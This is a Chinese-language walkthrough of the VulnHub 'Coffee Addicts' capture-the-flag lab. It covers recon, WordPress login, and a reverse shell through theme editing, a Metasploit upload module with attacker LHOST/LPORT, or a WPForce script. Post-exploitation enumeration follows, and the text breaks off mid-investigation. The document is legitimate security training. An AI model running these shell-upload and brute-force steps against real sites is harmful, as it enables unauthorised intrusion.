1、环境介绍
靶场介绍:https://www.vulnhub.com/entry/coffee-addicts-1,699/
靶场下载:https://download.vulnhub.com/coffeeaddicts/coffeeaddicts.ova
靶场难度:简单 - 中等
发布日期:2021年5月20日
文件大小:1.3 GB
靶场作者:BadByte
靶场描述:
- 我们的咖啡店被黑客入侵了!!你能修复损坏并找出是谁干的吗?
- 与VMware相比,这在VirtualBox中效果更好
打靶耗时:6+小时,整体还算顺畅,唯一卡顿就在找密码上,还有一处误导(不知道算不算)?
打靶关键:
- HTML 静态阅读
- WordPress 如何 GetShell
- id_rsa 密码爆破 或 SSH 密码爆破
- Linux信息收集、C++代码阅读、SUOD提权
2、主机发现与端口扫描
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:cb:7e:f5, IPv4: 192.168.56.3
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 3a:f9:d3:90:a4:64 (Unknown: locally administered)
192.168.56.44 08:00:27:af:a3:17 PCS Systemtechnik GmbH
2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.358 seconds (108.57 hosts/sec). 2 responded
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧
└─# nmap -T4 -sC -sV -p- -A --min-rate=1000 192.168.56.44
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-29 01:49 EST
Nmap scan report for 192.168.56.44
Host is up (0.00053s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fc:13:6a:6b:9b:e3:68:18:24:a1:de:2b:28:1e:61:5f (RSA)
| 256 c1:34:94:94:71:71:9c:6e:83:a6:be:c9:2a:1b:3f:d7 (ECDSA)
|_ 256 9a:cc:ce:ce:b8:2f:08:bb:2b:99:b6:25:3f:ec:44:61 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:AF:A3:17 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.53 ms 192.168.56.44
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.14 seconds
3、端口访问
3.1、22端口 - SSH
- 初步访问,看看有没有什么可用的提示信息
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧
└─# ssh 192.168.56.44
The authenticity of host '192.168.56.44 (192.168.56.44)' can·t be established.
ED25519 key fingerprint is SHA256:BWCczj8AdNhb8SBbp5fPUKT8SekaWiJXGqMl+3+pLy0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.44' (ED25519) to the list of known hosts.
[email protected]·s password:
Permission denied, please try again.
[email protected]·s password:
Permission denied, please try again.
[email protected]·s password:
[email protected]: Permission denied (publickey,password).
3.2、80端口 - Web
- 获取域名:
coffeeaddicts.thm
- 获取关键字:
ErrorCauser
、yee yee ass
、BTC
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧
└─# curl http://192.168.56.44/
ADD coffeeaddicts.thm to your /etc/hosts
- 添加 hosts
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧
└─# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
......
192.168.56.44 coffeeaddicts.thm
- Base64解码
- im_the_lizard_king 可能包含用户名
- youtube 打不开,这里就不访问了
┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧
└─# echo 'VEhNe2ltX3RoZV9saXphcmRfa2luZ30gaHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1kUXc0dzlXZ1hjUQ==' | base64 -d
THM{im_the_lizard_king} https://www.youtube.com/watch?v=dQw4w9WgXcQ
- 注释,获取代码
<!-- code taken from https://github.com/Nomy/Hacked-Website-Template -->
4、子域名扫描(没有扫到)
- 添加了域名,就可能包含子域名
ksubdomain enum -d coffeeaddicts.thm
gobuster dns -d coffeeaddicts.thm -r 192.168.56.44:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 256
gobuster vhost -u http://coffeeaddicts.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --append-domain --timeout 60s --random-agent -q | grep "Status: 200"
5、目录扫描
- 又是一个
WordPress
# 基础小字典,初扫摸底
dirb http://coffeeaddicts.thm
# 较全面 conda activate py37
dirsearch -u http://coffeeaddicts.thm -t 64 -e *
# 包含静态检查 conda activate py310
cd ~/dirsearch_bypass403 ; python dirsearch.py -u "http://coffeeaddicts.thm" -j yes -b yes
# 较全面 Plus conda activate py39
cd ~/soft/dirmap ; python3 dirmap.py -i http://coffeeaddicts.thm -lcf
# 常规文件扫描
gobuster dir -u http://coffeeaddicts.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
# 可执行文件扫描
gobuster dir -u http://coffeeaddicts.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x js,aspx,cgi,sh,jsp -e -k -r -q
# 压缩包,备份扫描
gobuster dir -u http://coffeeaddicts.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x rar,zip,7z,tar.gz,bak,txt,old,temp -e -k -r -q
- http://coffeeaddicts.thm/index.html
- http://coffeeaddicts.thm/badbyte.png
- http://coffeeaddicts.thm/wordpress/
- http://coffeeaddicts.thm/wordpress/wp-admin/
6、WordPress CMS 扫描
- 发现用户:
gus
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# wpscan --url http://coffeeaddicts.thm/wordpress/ --ignore-main-redirect --force -e --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | ·_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://coffeeaddicts.thm/wordpress/ [192.168.56.44]
[+] Started: Wed Nov 29 03:36:48 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://coffeeaddicts.thm/wordpress/xmlrpc.php
| Found By: Link Tag (Passive Detection)
| Confidence: 100%
| Confirmed By: Direct Access (Aggressive Detection), 100% confidence
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://coffeeaddicts.thm/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://coffeeaddicts.thm/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://coffeeaddicts.thm/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.7.1 identified (Insecure, released on 2021-04-15).
| Found By: Rss Generator (Passive Detection)
| - http://coffeeaddicts.thm/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=5.7.1</generator>
| - http://coffeeaddicts.thm/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.7.1</generator>
[+] WordPress theme in use: coffee-time
| Location: http://coffeeaddicts.thm/wordpress/wp-content/themes/coffee-time/
| Latest Version: 2.1.8 (up to date)
| Last Updated: 2019-07-25T00:00:00.000Z
| Readme: http://coffeeaddicts.thm/wordpress/wp-content/themes/coffee-time/readme.txt
| Style URL: http://coffeeaddicts.thm/wordpress/wp-content/themes/coffee-time/style.css?ver=5.7.1
| Style Name: Coffee Time
| Style URI: https://strabelli.com/roberto/temaswordpress/
| Description: Coffee Time is a minimalist, soft, smooth and responsive WordPress theme with device-agnostic layout...
| Author: Roberto Strabelli
| Author URI: https://roberto.strabelli.com
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.1.8 (80% confidence)
| Found By: Style (Passive Detection)
| - http://coffeeaddicts.thm/wordpress/wp-content/themes/coffee-time/style.css?ver=5.7.1, Match: 'Version: 2.1.8'
[+] Enumerating Vulnerable Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:00:10 <===========================================================> (6539 / 6539) 100.00% Time: 00:00:10
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:00 <=============================================================> (624 / 624) 100.00% Time: 00:00:00
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] No themes Found.
[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:03 <===========================================================> (2575 / 2575) 100.00% Time: 00:00:03
[i] No Timthumbs Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==============================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating DB Exports (via Passive and Aggressive Methods)
Checking DB Exports - Time: 00:00:00 <====================================================================> (71 / 71) 100.00% Time: 00:00:00
[i] No DB Exports Found.
[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
Brute Forcing Attachment IDs - Time: 00:00:00 <=========================================================> (100 / 100) 100.00% Time: 00:00:00
[i] Medias(s) Identified:
[+] http://coffeeaddicts.thm/wordpress/?attachment_id=10
| Found By: Attachment Brute Forcing (Aggressive Detection)
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] gus
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Nov 29 03:37:10 2023
[+] Requests Done: 10103
[+] Cached Requests: 8
[+] Data Sent: 2.963 MB
[+] Data Received: 1.514 MB
[+] Memory used: 261.875 MB
[+] Elapsed time: 00:00:22
- http://coffeeaddicts.thm/wordpress/xmlrpc.php
- http://coffeeaddicts.thm/wordpress/readme.html
- http://coffeeaddicts.thm/wordpress/wp-content/uploads/
- http://coffeeaddicts.thm/wordpress/wp-cron.php
- http://coffeeaddicts.thm/wordpress/wp-content/themes/coffee-time/readme.txt
- http://coffeeaddicts.thm/wordpress/?attachment_id=10
6.1、密文解码(没解出来)
dc6b218a37f27e0f2b33aee11f7adfd2
7、下载的代码解析(好像也没有啥有用信息)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# git clone https://github.com/Nomy/Hacked-Website-Template
正克隆到 'Hacked-Website-Template'...
remote: Enumerating objects: 9, done.
remote: Total 9 (delta 0), reused 0 (delta 0), pack-reused 9
接收对象中: 100% (9/9), 完成.
处理 delta 中: 100% (1/1), 完成.
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# cd Hacked-Website-Template
(base) ┌──(root㉿kali)-[~/soft/hack/Hacked-Website-Template] (๑•̀ㅂ•́)و✧
└─# ls -al
总计 16
drwxr-xr-x 3 root root 4096 11月29日 03:08 .
drwxr-xr-x 3 root root 4096 11月29日 03:08 ..
drwxr-xr-x 8 root root 4096 11月29日 03:08 .git
-rw-r--r-- 1 root root 798 11月29日 03:08 index.html
7.1、index.html
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# cat Hacked-Website-Template/index.html
<html>
<head>
<title>Hacked by D3W3Y</title>
<style>
iframe { display: none; }
</style>
</head>
<body background="https://i.imgur.com/5rZ91h5.gif">
<iframe width="200" height="113" src="https://www.youtube.com/embed/hZsaPu-kthY?playlist=hZsaPu-kthY&autoplay=1&loop=1&rel=0&controls=0&showinfo=0" frameborder="0" allowfullscreen></iframe>
<center>
<h1 style=color:red;>(? ?? ? ??)? D0 Y0U W4NN4 PL4Y A G4M3 ? (?? ? ??? )</h1>
<h2 style=color:green;>This website is H4CK3D by D3W3Y.</h2>
<img src="https://i.imgur.com/OhoiDOT.png">
<h3 style=color:grey;>*****地獄 CYBER PIRATES******</h3>
<p style=color:grey;>Greetz to --> ezirprus, revaer luos, yzeets, yajyaj, ximer, erifdliw, selym, yeda, zalbzaw, ongap, ymon</p>
</center>
</body>
</html>
- 字符串替换(应该也算是密文解码吧)
- [0] → [o]
- [4] → [a]
- [3] → [e]
D0 Y0U W4NN4 PL4Y A G4M3 ?
do you wanna play a game ?
你想玩个游戏吗?
This website is H4CK3D by D3W3Y.
This website is HACKED by DEWEY.
这个网站被DEWEY破坏了。
7.2、.git 文件
- 最早版本
<html>
<head>
<embed src="https://www.youtube.com/v/hZsaPu-kthY&hl=en_US&loop=1&feature=related&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
<title>Hacked by D3w3y</title>
</head>
<body background="https://i.imgur.com/5rZ91h5.gif"></body>
<center>
<h1 style=color:red;>(? ?? ? ??)? d0 y0u w4nn4 pl4y 4 64m3 ? (?? ? ??? ) </h1>
<h2 style=color:green;>d15 w3b5173 15 h4ck3d by D3w3y.</h4>
<img src="https://i.imgur.com/OhoiDOT.png">
<h3 style=color:grey; >*****地獄 CYBER PIRATES******</h1>
<p style=color:grey; >Greetz to--> ezirprus, revaer luos, yzeets, yajyaj, ximer, erifdliw, selym, yeda, zalbzaw, ongap, ymon</p>
</center>
</html>
- 字符串替换
- [0] → [o]
- [1] → [i]
- [3] → [e]
- [4] → [a]
- [5] → [s]
- [6] → [g]
- [7] → [t]
d0 y0u w4nn4 pl4y 4 64m3 ?
do you wanna play a game ?
你想玩个游戏吗?
d15 w3b5173 15 h4ck3d by D3w3y.
dis website is hacked by Dewey.
dis网站被dewey入侵。
8、静态检测
- 当前可用信息不足,回头重新审视博客内容
8.1、HTML静态检查
- 疑似用户密码:
gus
:gus i need you back
8.2、JS静态检测
(base) ┌──(root㉿kali)-[~/SecretFinder] (๑•̀ㅂ•́)و✧
└─# python3 SecretFinder.py -i http://coffeeaddicts.thm/wordpress/ -e -g 'jquery;bootstrap;api.google.com' -o cli
[ + ] URL: http://coffeeaddicts.thm/wordpress/wp-content/themes/coffee-time/js/navigation.js?ver=20151215
[ + ] URL: http://coffeeaddicts.thm/wordpress/wp-content/themes/coffee-time/js/skip-link-focus-fix.js?ver=20151215
[ + ] URL: http://coffeeaddicts.thm/wordpress/wp-content/themes/coffee-time/js/showhide.js?ver=5.7.1
[ + ] URL: http://coffeeaddicts.thm/wordpress/wp-includes/js/wp-embed.min.js?ver=5.7.1
9、尝试登录
9.1、WordPress 登录
- 直接尝试(失败)
- 尝试去掉空格(成功)
9.2、SSH 登录(失败)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# ssh [email protected]
[email protected]·s password:
Permission denied, please try again.
[email protected]·s password:
Permission denied, please try again.
[email protected]·s password:
[email protected]: Permission denied (publickey,password).
10、上传 PHP 反弹连接(三个方法选其一即可)
10.1、方法一:修改主题(实操)
- 找到绝对路径
# 之前 CMD 扫描,找到了当前主题路径
# theme=coffee-time
http://coffeeaddicts.thm/wordpress/wp-admin/theme-editor.php?theme=coffee-time&Submit=Select
http://coffeeaddicts.thm/wordpress/wp-content/themes/coffee-time/readme.txt
# 合理类推
# theme=twentynineteen
http://coffeeaddicts.thm/wordpress/wp-admin/theme-editor.php?theme=twentynineteen&Submit=Select
http://coffeeaddicts.thm/wordpress/wp-content/themes/twenty-nineteen/404.php
10.2、方法二:MSF
msfconsole
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.56.44
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set VHOST coffeeaddicts.thm
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST 192.168.56.3
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LPORT 10086
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME gue
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD gusineedyouback
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
10.3、方法三:脚本
git clone https://github.com/n00py/WPForce
cd WPForce
# 用户密码爆破
python wpforce.py -i users.txt -w pwdlist.txt -u "http://www.targetsite.com"
# 获取用户密码后,获取 WebShell
python yertle.py -u gue -p gusineedyouback -t http://coffeeaddicts.thm/wordpress/ --interactive
11、信息收集
# 触发反弹连接
http://coffeeaddicts.thm/wordpress/wp-content/themes/twenty-nineteen/404.php
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# nc -lvnp 7890
listening on [any] 7890 ...
connect to [192.168.56.3] from (UNKNOWN) [192.168.56.44] 56610
Linux CoffeeAdicts 4.15.0-140-generic #144-Ubuntu SMP Fri Mar 19 14:12:35 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
02:49:09 up 5:09, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ SHELL=/bin/bash script -q /dev/null
www-data@CoffeeAdicts:/$
11.1、基本信息收集
- 存在可利用版本漏洞
www-data@CoffeeAdicts:/$ history
history
1 history
www-data@CoffeeAdicts:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@CoffeeAdicts:/$ sudo -l
sudo -l
[sudo] password for www-data:
Sorry, try again.
[sudo] password for www-data:
Sorry, try again.
[sudo] password for www-data:
sudo: 3 incorrect password attempts
www-data@CoffeeAdicts:/$ /usr/sbin/getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null
www-data@CoffeeAdicts:/$ crontab -l
crontab -l
no crontab for www-data
www-data@CoffeeAdicts:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@CoffeeAdicts:/$ hostnamectl
hostnamectl
Static hostname: CoffeeAdicts
Icon name: computer-vm
Chassis: vm
Machine ID: 3f18d050ac1b4b5699c88df3be1114f9
Boot ID: d3df9b52085a4f7ba53c6d06fd0e76f7
Virtualization: oracle
Operating System: Ubuntu 18.04.5 LTS
Kernel: Linux 4.15.0-140-generic
Architecture: x86-64
www-data@CoffeeAdicts:/$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
www-data@CoffeeAdicts:/$ echo $BASH_VERSION
echo $BASH_VERSION
4.4.20(1)-release
www-data@CoffeeAdicts:/$ ifconfig
ifconfig
enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.56.44 netmask 255.255.255.0 broadcast 192.168.56.255
inet6 fe80::a00:27ff:feaf:a317 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:af:a3:17 txqueuelen 1000 (Ethernet)
RX packets 5778351 bytes 897140291 (897.1 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 6849981 bytes 2496381812 (2.4 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 57269 bytes 4129804 (4.1 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 57269 bytes 4129804 (4.1 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
11.2、文件信息收集
11.2.1、/etc/passwd 信息
- 两个用户:
gus
、badbyte
www-data@CoffeeAdicts:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
gus:x:1000:1000:gus,,,:/home/gus:/bin/bash
mysql:x:111:115:MySQL Server,,,:/nonexistent:/bin/false
badbyte:x:1001:1001:,,,:/home/badbyte:/bin/bash
11.2.2、特权文件
- 可利用漏洞:
polkit-agent-helper-1
www-data@CoffeeAdicts:/$ find / -user root -perm /4000 2>/dev/null
find / -user root -perm /4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/pkexec
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/umount
/bin/ping
/bin/fusermount
/bin/mount
www-data@CoffeeAdicts:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/pkexec
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/umount
/bin/ping
/bin/fusermount
/bin/mount
11.2.3、用户相关文件
- 可能是黑客的名字:
Nicolas Fritzges
- 发现可疑文件夹:
/opt/BadByte
- 发现ROOT权限执行命令脚本:
shell
- 发现ROOT权限执行命令脚本:
www-data@CoffeeAdicts:/$ find / -user gus 2>/dev/null
find / -user gus 2>/dev/null
/home/gus
/home/gus/.local
/home/gus/.local/share
/home/gus/.profile
/home/gus/.bashrc
/home/gus/.bash_history
/home/gus/readme.txt
/home/gus/.sudo_as_admin_successful
/home/gus/.cache
/home/gus/.gnupg
/home/gus/user.txt
/home/gus/.bash_logout
www-data@CoffeeAdicts:/$ find / -user badbyte 2>/dev/null
find / -user badbyte 2>/dev/null
/home/badbyte
/home/badbyte/.profile
/home/badbyte/.bashrc
/home/badbyte/.bash_history
/home/badbyte/.cache
/home/badbyte/.gnupg
/home/badbyte/.bash_logout
www-data@CoffeeAdicts:/$ find / -iname *gus* 2>/dev/null
find / -iname *gus* 2>/dev/null
/usr/src/linux-headers-4.15.0-140-generic/include/config/ir/igorplugusb.h
/usr/src/linux-headers-4.15.0-140/include/sound/gus.h
/usr/src/linux-headers-4.15.0-140/sound/isa/gus
/usr/share/zoneinfo/posix/Asia/Famagusta
/usr/share/zoneinfo/Asia/Famagusta
/usr/share/zoneinfo/right/Asia/Famagusta
/lib/modules/4.15.0-140-generic/kernel/drivers/media/rc/igorplugusb.ko
/proc/sys/net/ipv4/icmp_ignore_bogus_error_responses
/home/gus
www-data@CoffeeAdicts:/$ find / -iname *badbyte* 2>/dev/null
find / -iname *badbyte* 2>/dev/null
/opt/BadByte
/var/www/coffeeaddicts.thm/public_html/badbyte.png
/home/badbyte
www-data@CoffeeAdicts:/$ cat /home/gus/user.txt
cat /home/gus/user.txt
THM{s4v3_y0uR_Cr3d5_b0i}
www-data@CoffeeAdicts:/$ cat /home/gus/readme.txt
cat /home/gus/readme.txt
hello, admin.
你好,管理员。
as you can see your site has been hacked, any attempt of fixing it is futile, as we removed you from the sudoers and we changed the root password.
正如你所看到的,你的网站已经被黑客入侵,任何修复它的尝试都是徒劳的,因为我们将你从sudoers中删除,并更改了根密码。
~Nicolas Fritzges
www-data@CoffeeAdicts:/$ cd /opt/BadByte
cd /opt/BadByte
www-data@CoffeeAdicts:/opt/BadByte$ ls -al
ls -al
total 32
drwxr-xr-x 2 root root 4096 Apr 7 2021 .
drwxr-xr-x 3 root root 4096 Apr 6 2021 ..
-rw-r--r-- 1 root root 1024 Apr 6 2021 .shell.cpp.swp
-rwxr-xr-x 1 root root 13816 Apr 6 2021 shell
-rw-r--r-- 1 root root 325 Apr 6 2021 shell.cpp
www-data@CoffeeAdicts:/opt/BadByte$ cat shell.cpp
cat shell.cpp
#include <iostream>
#include <string>
#include <stdio.h>
#include <stdlib.h>
#include <cstring>
using namespace std;
int main() {
while(1){
string command;
cout << "BadByte # ";
cin >> command;
char cstr[command.size() + 1];
strcpy(cstr, command.c_str());
system(cstr);
//cout << "BadByte # " << command;
}
return 0;
}
- 着重检查用户相关文件「badbyte」
www-data@CoffeeAdicts:/$ cd /home/gus
cd /home/gus
www-data@CoffeeAdicts:/home/gus$ ls -al
ls -al
total 44
drwxr-xr-x 5 gus gus 4096 Apr 6 2021 .
drwxr-xr-x 4 root root 4096 Apr 6 2021 ..
-rw------- 1 gus gus 13 Apr 6 2021 .bash_history
-rw-r--r-- 1 gus gus 220 Apr 6 2021 .bash_logout
-rw-r--r-- 1 gus gus 3771 Apr 6 2021 .bashrc
drwx------ 2 gus gus 4096 Apr 6 2021 .cache
drwx------ 3 gus gus 4096 Apr 6 2021 .gnupg
drwxrwxr-x 3 gus gus 4096 Apr 6 2021 .local
-rw-r--r-- 1 gus gus 807 Apr 6 2021 .profile
-rw-r--r-- 1 gus gus 0 Apr 6 2021 .sudo_as_admin_successful
-rw-rw-r-- 1 gus gus 181 Apr 6 2021 readme.txt
-rw-rw-r-- 1 gus gus 25 Apr 6 2021 user.txt
www-data@CoffeeAdicts:/home/gus$ cd /
cd /
www-data@CoffeeAdicts:/$ cd /home/badbyte
cd /home/badbyte
www-data@CoffeeAdicts:/home/badbyte$ ls -al
ls -al
total 40
drwxr-xr-x 5 badbyte badbyte 4096 Apr 15 2021 .
